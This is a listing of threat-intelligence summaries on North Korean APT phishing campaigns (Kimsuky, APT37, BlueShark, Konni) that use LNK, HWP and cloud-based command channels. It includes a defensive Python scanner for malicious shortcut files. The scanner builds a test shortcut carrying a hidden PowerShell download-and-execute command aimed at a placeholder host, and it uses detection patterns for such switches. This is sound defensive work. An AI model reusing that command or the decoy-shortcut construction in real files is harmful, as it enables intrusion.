Summary:
This report highlights the ongoing phishing attacks attributed to the Kimsuky group, which have evolved to evade detection by utilizing various domains and tactics. The attackers have shifted their operations from Japan to Russia, employing malware-less strategies that exploit familiar financial themes to deceive victims.…
Author: Genians-Korea
Summary:
The report analyzes the covert cyber reconnaissance activities of the state-backed APT37 group, which targets South Korean individuals and organizations related to North Korean human rights and security. It highlights the group’s use of malicious shortcut files and the necessity for enhanced endpoint detection and response (EDR) solutions to counteract these threats.…
1. Short Summary
The BlueShark APT group has been actively targeting individuals in South Korea during the first half of 2024, utilizing various malware types and spear-phishing tactics disguised as legitimate requests for lectures and interviews.
2. Keypoints
Utilization of various types of malware such as LNK, ISO, MSC, and HWP.…
1. Short Summary
The article discusses the increasing threat activity associated with the Kimsuky group, particularly focusing on the Konni campaign. It highlights the use of legitimate cloud and FTP services in a step-by-step infection chain, with various attack attempts targeting not only South Korea but also Russian government agencies.…
◈ Short Summary
Uses tax evasion report notifications as a pretext to impersonate the tax authority and gain initial access
Creates confusion by suggesting a tax audit, amplifying anxiety about the sources of funding
Attempts internal reconnaissance through LNK-type malicious files
Executes malicious script commands through the legitimate AutoIt interpreter
Employs techniques to evade antivirus detection, leaving EDR as the means of detection and response.…
◈ Executive Summary
Impersonation of North Korea-related questionnaires, manuscripts, security columns, articles, and monthly magazines
LNK-type malicious files hidden inside ZIP archives
Use of cloud storage such as Dropbox and pCloud as attack infrastructure
Continued fileless RoKRAT attacks by the APT37 group
Early detection of the LNK and PowerShell stages with Genian EDR
1.…
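The LNK-in-ZIP delivery described in the summaries above (shortcut files hidden inside ZIP archives, internal reconnaissance and PowerShell launched from an LNK) can be triaged at the mail gateway or on a sandbox before the archive reaches a user. The following is an added example, not code from the Genians report or from the Genian EDR product: a Python scanner that parses the MS-SHLLINK header and StringData fields of every .lnk entry in a ZIP and flags shortcuts whose target is a script host, or whose arguments carry execution-policy or hidden-window switches, over-long padding, or a decoy double extension. The archive contents, the file names and the `example.invalid` URL are constructed for the demonstration; the parser skips LinkTargetIDList and LinkInfo by their declared sizes and assumes those sizes are well-formed.

```python
"""Scan a ZIP archive for Windows shortcut (.lnk) files that launch a script host.

Shell link layout (MS-SHLLINK): 76-byte header, optional LinkTargetIDList,
optional LinkInfo, then the StringData fields in a fixed order.
"""
import io
import re
import struct
import zipfile

LNK_HEADER_SIZE = 0x4C
# LinkCLSID {00021401-0000-0000-C000-000000000046} in its on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80

SCRIPT_HOSTS = re.compile(
    r"(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil)(\.exe)?",
    re.IGNORECASE)
SUSPICIOUS_ARGS = re.compile(
    r"(-ep\s+bypass|-executionpolicy\s+bypass|-w(indowstyle)?\s+hidden|\biex\b|"
    r"invoke-expression|downloadstring|frombase64string|-enc(odedcommand)?\b)",
    re.IGNORECASE)
MAX_VISIBLE_ARGS = 260  # Explorer's property sheet shows about this many characters


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link; raise ValueError if it is not one."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short for a shell link header")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link (bad HeaderSize or LinkCLSID)")
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize counts the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        pos += width * count
        fields[name] = raw.decode("utf-16-le" if width == 2 else "latin-1", errors="replace")
    return fields


def scan_zip(zip_bytes: bytes) -> list:
    """Return one finding per .lnk entry that is malformed or launches a script host."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                fields = parse_lnk(zf.read(info))
            except ValueError as exc:
                findings.append({"entry": info.filename, "verdict": "malformed", "reasons": [str(exc)]})
                continue
            target, args = fields.get("relative_path", ""), fields.get("arguments", "")
            basename = target.replace("\\", "/").rsplit("/", 1)[-1]
            reasons = []
            if SCRIPT_HOSTS.fullmatch(basename):
                reasons.append("target is a script host: " + basename)
            if SUSPICIOUS_ARGS.search(args):
                reasons.append("suspicious arguments: " + args.strip()[:80])
            if len(args) > MAX_VISIBLE_ARGS:
                reasons.append("arguments padded beyond what Explorer shows (%d chars)" % len(args))
            if info.filename.lower()[:-4].endswith((".hwp", ".pdf", ".doc", ".docx", ".xlsx", ".txt")):
                reasons.append("double extension hides the .lnk suffix")
            if reasons:
                findings.append({"entry": info.filename, "verdict": "suspicious", "reasons": reasons})
    return findings


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode shell link (constructed test input, not a real sample)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0)  # ShowCommand 7 = minimised
    id_list = struct.pack("<H", 2) + b"\x00\x00"            # empty IDList: TerminalID only
    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + id_list + string_data(relative_path) + string_data(arguments)


def build_sample_zip() -> bytes:
    """Constructed archive: a decoy-named shortcut to PowerShell plus a benign shortcut."""
    bad = build_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                    " " * 300 + "-NoP -W Hidden -Ep Bypass -c "
                    "\"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/s2')\"")
    good = build_lnk(r"..\..\Windows\System32\notepad.exe", "readme.txt")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("questionnaire.hwp.lnk", bad)
        zf.writestr("readme.lnk", good)
        zf.writestr("cover.jpg", b"\xff\xd8\xff\xe0")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip(build_sample_zip()):
        print(finding)
```

Only the decoy-named entry is reported, with four reasons (script-host target, hidden-window switch, padded arguments, double extension); the notepad shortcut and the JPEG are ignored. In production the same parser can be pointed at the LNK's `working_dir` and `icon_location` as well, since both are also used to stage or disguise payloads, and the verdict should be written to the mail gateway or EDR log rather than printed.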
◈ Executive Summary
Delivery of HWP documents containing malicious OLE objects, with initial contact made under the guise of interview requests from foreign news channels
Execution of encrypted PowerShell commands using the FlowerPower APT attack tool series
Use of GitHub, the code hosting platform for version control and collaboration, as the command-and-control channel for threat commands
Damage minimized through threat visibility and early detection with the Genian EDR solution
1.…